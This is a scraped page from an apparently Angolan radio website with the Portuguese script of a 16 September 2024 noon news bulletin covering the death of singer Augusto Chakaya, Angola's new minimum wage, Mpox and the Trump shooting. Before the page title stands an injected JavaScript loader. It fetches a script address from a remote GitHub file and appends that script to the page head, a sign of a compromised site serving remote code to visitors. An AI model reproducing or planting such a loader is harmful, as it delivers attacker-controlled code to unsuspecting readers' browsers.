;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal 12h, edição de 16 de Setembro de 2024 | RadioPlayDigital
Jornal 12h, edição de 16 de Setembro de 2024

Tópicos:

MORREU AUGUSTO CHAKAYA, A VOZ PRINCIPAL DOS  JOVENS DO PRENDA, UM DOS MAIORES AGRUPAMENTOS MUSICAIS DE ANGOLA;  

JINGLE MUSICA AUGUSTO CHAKAYA 

 

EM VIGOR APARTIR DE HOJE  SALARIO MINIMO EM ANGOLA NO VALOR DE 70 MIL KUANZAS;   

TRABALHADORES DA REFINARIA DE LUANDA SEM ENQUADRAMENTO NA SONANGOL APELAM A INTERVENÇÃO URGENTE DO PRESIDENTE DA REPÚBLICA;  

DESCARGAS ELECTRICAS MATAM CINCO PESSOAS NA LUNDA NORTE E BIÉ;  

MINISTERIO DA SAUDE GARANTE QUE ANGOLA CONTINUA LIVRE DA VARIOLA DO MACACO;     

EXPLORAÇÃO DE PETROLEO PODE AUMENTAR EM ANGOLA,  ESTIMA CONSULTORA BRITANICA;  

BIDEN MANDA REFORÇAR SEGURANÇA DE TRUMP DEPOIS DE NOVOS DISPARADOS EM DIRECÇÃO DO EX PRESIDENTE NORTE AMERICANO;     

JINGLE MIX

Jornal ao meio dia de segunda feira são 16 de Setembro. Coordenação de Alves Fernandes, técnica de Edmundo Simões e Edson Machado.

JINGLE MVIEIRA 

Morreu na noite de ontem, domingo, numa unidade hospitalar de Luanda, o músico AUGUSTO CHAKAYÁ, a voz principal dos Jovens do Prenda, um dos mais conceituados agrupamentos da música popular angolana.

De nome próprio, AUGUSTO JOÃO LUÍS, o compositor e intérprete do semba partiu para a eternidade ao 73 anos, numa altura em que os Jovens do Prenda preparam o lançamento de um novo duplo CD, tendo Augusto Chakayá como vocalista principal.

Alves Fernandes tem em directo um dos familiares de Augusto Chakaya, para mais informações sobre este gigante da musica que ontem a noite partiu para a eternidade…  

ALVES FERNANDES ENTREVISTA 12H 

Um dos clássicos da musica popular angolana de autoridade Augusto Chakaya que ontem partiu para eternidade aos 72 anos.  

JINGLE AUGUSTO CHAKAYA 

Os trabalhadores da refinaria de Luanda, que operam em regime de contrato de cedência temporária, acusam o Conselho de Administração da Sonangol de violar sistematicamente as leis vigentes no País.

Em causa está o não reconhecimento de um  parecer do MAPTESS , que orienta Sonangol a regularizar com maior brevidade a situação dos funcionários constantes nos cadernos reivindicativos. 

Em comunicado os trabalhadores dizem que reclamam há mais de 25 anos a falta de enquadramento efectivo junto da Sonangol, ajuste salarial e melhores condições laborais.

Os mesmos solicitam ao Titular do poder executivo, João Lourenço, a intervir de forma urgente a fim de ver resolvida a situação que afecta mais de 60 trabalhadores. 

O documento assinado por Adilson Serra, porta-voz dos lesados, afirma que estão abertos ao diálogo e esperam o bom senso da entidade patronal tendo em conta que não é vontade dos trabalhadores paralisar os trabalhos;

ADILSON SERRA 12H 

PONTO

A Nova Tabela do Salário Mínimo Nacional, aprovada em Julho pelo Governo, entra em vigor, a partir de hoje, conforme estabelecido  e passados 60 dias desde a publicação em Diário da República.

Desta forma, o salário mínimo, em Angola, passa para 70 mil kwanzas, com excepção às microempresas e startups, que podem pagar um mínimo de 50 mil kwanzas. 

O Decreto Presidencial, que estabelece a actualização da remuneração dos trabalhadores, datado de 17 de Julho, entra em vigor 60 dias após a publicação do diploma.

Está, também, previsto que, após 12 meses (1 ano) da entrada em vigor, o montante do salário mínimo nacional será novamente actualizado para 100 mil kwanzas.

Até, então, o salário mínimo era de 32.000 kwanzas. Esta medida, implementada pelo Governo, não impede as empresas e os representantes dos trabalhadores de acordarem salários mínimos superiores ao previsto.

Às empresas sem capacidade financeira comprovada para pagar o Salário Mínimo Nacional definido é dada a possibilidade de solicitarem ao Governo o pagamento, temporariamente, abaixo do nível determinado, sendo que a autorização não pode ultrapassar os dois anos.

O director nacional do Trabalho, António Estote, fez saber, que o cumprimento da medida é obrigatório para todos os patrões e apelou que se olhe para esse facto como uma actualização necessária. 

PONTO

O Instituto Nacional de Estatística já começou a distribuil os mais 70 mil tablets, e outos matérias que vão auxiliar na materialização do CENSO 2024.

José Calengi fez saber no ultimo sábado que o Instituto Nacional de Estatística deu o início a distribuição do material do censo, em todas as províncias, e de que a meta é ate o final do dia de hoje, este processo seja concluído.

Segundo o director do INE, José Calengi, o processo decorre conforme programado. 

JOSE CALENGI 12H 

O Ministério da Saúde reiterou, este domingo, em comunicado de imprensa que “Angola continua livre de casos da denominada Varíola do Macaco”.

Na nota, o MINSA diz que tomou conhecimento da circulação nas redes sociais de um vídeo com imagens de um alegado caso de Mpox na província do Zaire, em condições de “desrespeito à ética e deontologia profissional e violação da privacidade do paciente e gerando algum pânico no seio da população”. 

Segundo o Ministério da Saúde, tratou-se de um paciente do sexo masculino, 46 anos de idade, nacionalidade angolana, com sintomas de lesões cutâneas e febre, que deu entrada no Hospital Municipal do Cuimba e, posteriormente  evacuado para o Hospital Provincial de Mbanza Kongo. 

Por essa razão, lê-se na nota, face às evidências que esses vídeos tenham sido vazados por pessoas em contacto com o caso suspeito, considera absolutamente irresponsável a disseminação fora dos canais oficialmente estabelecidos, de vídeos, fotografias, áudios, etc. que, violam a privacidade dos doentes e que são contra o sigilo profissional. 

Para o MINSA, tais actos, que ferem gravemente as boas práticas e procedimentos de atendimento de utentes hospitalares, merecerão doravante tolerância zero e serão passíveis dos procedimentos disciplinares e outros que se imponham, caso seja provado que foram protagonizados por funcionários em serviço nas unidades sanitárias.

O reforço do diálogo e cooperação entre as delegações ministeriais da República Democrática do Congo e do Rwanda, visando o fim definitivo das hostilidades na Região Leste do país vizinho, dominou, sábado, em Luanda, a realização da 4.ª Sessão Ministerial, sob a mediação de Angola.

O encontro, que decorreu na sede do Ministério das Relações Exteriores, além de servir para a apreciação do Relatório dos Peritos de Inteligência, contemplou a aprovação da Acta da 3.ª Reunião Ministerial, realizada, igualmente, na capital angolana, nos dias 20 e 21 de Agosto deste ano.

À semelhança das anteriores, a reunião de ontem teve como finalidade a busca de consenso para a estabilização do Leste da República Democrática do Congo, na sequência da proposta concreta de acordo de paz duradoura e definitiva apresentada pelo Presidente da República, João Lourenço, enquanto mediador designado pela União Africana.

PONTO ECONOMIA 

Presidente Norte americano deve visitar angola nas próximas semanas.

A confirmar-se a deslocação, esta será a primeira visita de um presidente norte-americano a Angola. 

Antes de Biden, a visita do secretário da Defesa, Lloyd Austin, há um ano, marcou a única viagem a Angola de um alto funcionário da Administração norte-americana.

Os pormenores da viagem de Biden estão ainda a ser ultimados, mas esta deverá ocorrer nas semanas após a Assembleia Geral das Nações Unidas se reunir, entre 22 e 23 de Setembro, e antes das eleições presidenciais de 5 de novembro, acrescentou uma das fontes.

O analista Carlos Rosado de Carvalho disse que a visita de Biden a angola é de extrema importância;

CARLOS ROSADO DE CARVALHO BIDEN 12H 

A consultora Oxford Economics reviu em alta a previsão de  crescimento da produção de petróleo em Angola, antevendo que o segundo maior produtor da África subsaariana bombeie 1,18 milhões de barris diários, mais 4% que em 2023.

“Preve-se  que a produção de petróleo em Angola aumente 4%, de 1,13 milhões de barris diários em 2023, para 1,18 milhões de barris por dia em 2024, e depois suba ligeiramente para 1,19 milhões de barris em 2025″, escrevem os analistas do departamento africano desta consultora britânica.  

Os analistas referem ainda que apesar de ter sido um pouco mais baixa em Agosto,  “a produção acumulada nos primeiros oito meses do ano é consideravelmente maior que no período homólogo de 2023.

A produção de petróleo em Angola em Agosto foi de 1,20 milhões de barris por dia, um pouco abaixo dos 1,22 milhões de barris bombeados diariamente em Julho, de acordo com os dados da Agência Internacional da Energia.

PONTO

Cinco pessoas morreram vitimas de descargas elétricas, nas províncias da Lunda norte e Bie.

Os dados foram avançados esta manha a MFM pelo Porta dos Serviços de Proteção Civil e Bombeiros, Superintendentes Bombeiro, Wilson Baptista que afirmou ternem registados nas ultimas 72 horas mais 100 ocorrências diversas, que resultaram num total de 12 mortos .

WILSON BAPTISTA 2

Superintendente  Bombeiro, Wilson Baptista, porta dos Serviços de Proteção Civil e Bombeiros e o BALANCO DAS ULTIMAS 72 DUAS HORAS EM TODOS O PAÍS.

O INAC recepcionou no período de 08 a 14 de Setembro de 2024 cerca de 397 denúncias de violência contra crianças em todo o país com destaque as províncias de Bié Benguela Cunene Huambo Luanda e Uíge.  

Rosalina Domingos é a porta voz do INAC;

ROSALINA DOMINGOS 12H 

Cidadãos em Luanda apelam a celeridade nas obras de reabilitação de estradas secundarias e terciárias em Luanda, devido aos transtornos causados no trafego rodoviário. 

Os ouvintes que intervieram esta manha no  SHOW DA MANHA  avançaram com a necessidade de se tratar das estradas antes do inicio da época das chuvas que se avizinha;

OUVINTES 12H   

Via do mercado das peças a sétima avenida mais conhecida por canivete no município do Cazenga, encontra-se interdita ha quase um ano dificultando assim a circulação de veículos e bens, água parada montante de lixo é o novo cenário  para quem vive e por ali frequenta  diariamente.

Os moradores e automobilistas mostram-se preocupados por essa situação se prolongar um ano ,sendo que a mesma tem causado diversos constrangimentos , e que ja é do conhecimento da administração local .

R D MORADORES MERCADO DAS PEÇAS 

8.500 Famílias Foram Atendidas Pelo Centro de Acção Social Integrada-CASI.

Isaías Domingos, coordenador do projeto, anunciou neste sábado em Luanda, que o CASI, atendeu de Janeiro a Agosto deste ano 1446 pessoas carentes, correspondente a 8.500 agregados familiares no município de Cazenga.

2560 foi o numero de pacientes que deu entrada no hospital geral dos Cajueiros , sendo o banco de urgência de cirurgia e de medicina estarem ligeiramente agitado.

Segundo o que nos conta  Marcelina Barão ,directora de enfermagem do hospital geral dos cajueiros, fazendo o balanço das ultimas  72 horas;  

RD MARCELINA BARÃO 1

Face ao feriado prolongado a responsável afirmou ainda, que o hospital encontra-se em prontidão em termos de material gastável e não só,   para acudir pressão do feriado.

RD MARCELINA BARÃO 2

INTERNACIONAL

Serviço Secreto dos EUA diz que investiga o caso, ocorrido próximo ao clube de golfe do ex-presidente republicano na Flórida. Um fuzil AK-47 foi apreendido no local, segundo a Associated Press.

O tiroteio ocorreu próximo ao clube de golfe de Trump em West Palm Beach, na Flórida. 

O suspeito de ser o autor dos disparos foi preso. Um fuzil AK-47 com mira e uma câmera GoPro foram encontrados. O atirador foi identificado como Ryan Wesley Routh, segundo a Associated Press.

Um agente do Serviço Secreto estava à frente de Trump enquanto o ex-presidente jogava e viu o cano de um fuzil em um arbusto perto da propriedade, segundo o xerife Ric Bradshaw, do condado de Palm Beach. O republicano estava a cerca de 400 metros do atirador, informou o xerife.

Os agentes enfrentaram o atirador e dispararam pelo menos quatro cartuchos de munição por volta das 13h30. Então, o suspeito largou seu rifle, duas mochilas e outros itens e fugiu em um carro preto. Segundo o xerife, uma testemunha viu o homem e conseguiu tirar fotos de seu carro e da placa.

Presidente cessante dos Estados Unidos, Joe Biden, disse que deu ordens para reforçar a proteção de Donald Trump, após o candidato republicano à presidência ter sido alvo de uma nova tentativa de assassínio.

Num comunicado divulgado no domingo, Biden disse ter pedido à sua administração para garantir que os Serviços Secretos “têm todos os recursos, capacidades e medidas de proteção necessárias para garantir a segurança contínua” de Trump.

Um suspeito está sob custódia e elogio o trabalho do Serviço Secreto e dos seus parceiros responsáveis pela aplicação da lei pela sua vigilância e esforços para manter o ex-presidente e aqueles que o rodeiam em segurança.  

Biden sublinhou ainda que há a decorrer uma investigação sobre o incidente e que as forças de segurança estão a reunir mais detalhes sobre o que aconteceu.

Também a rival democrata na corrida à presidência dos Estados Unidos, Kamala Harris, emitiu um comunicado a condenar a violência política, dizendo estar “profundamente perturbada” com o incidente.

Vários funcionários públicos de Moçambique, nomeadamente professores, estão a abandonar os postos de trabalho para se dedicarem à campanha eleitoral da Frelimo, partido no poder. 

A situação está a preocupar a igreja católica que alerta para o facto de muitos alunos estarem sem aulas no país. 

Esta semana, a Associação Nacional dos Professores “intimidações e coacção” dos profissionais da classe para participar da campanha de Daniel Chapo da FRELIMO.

A igreja católica em Moçambique, está preocupada com o abandono dos funcionários públicos dos seus postos de trabalho para se dedicarem à campanha eleitoral da Frelimo. 

O arcebispo da igreja católica na Beira, Dom Claudio Dalla Zuana, alerta para o facto de muitas escolas não estarem a funcionar, sublinhando que a campanha eleitoral não deve paralisar o país.

Data de Emissão: 13-09-2024 às 12:00
Género(s): Noticiário
 
PARTICIPANTES

Relacionados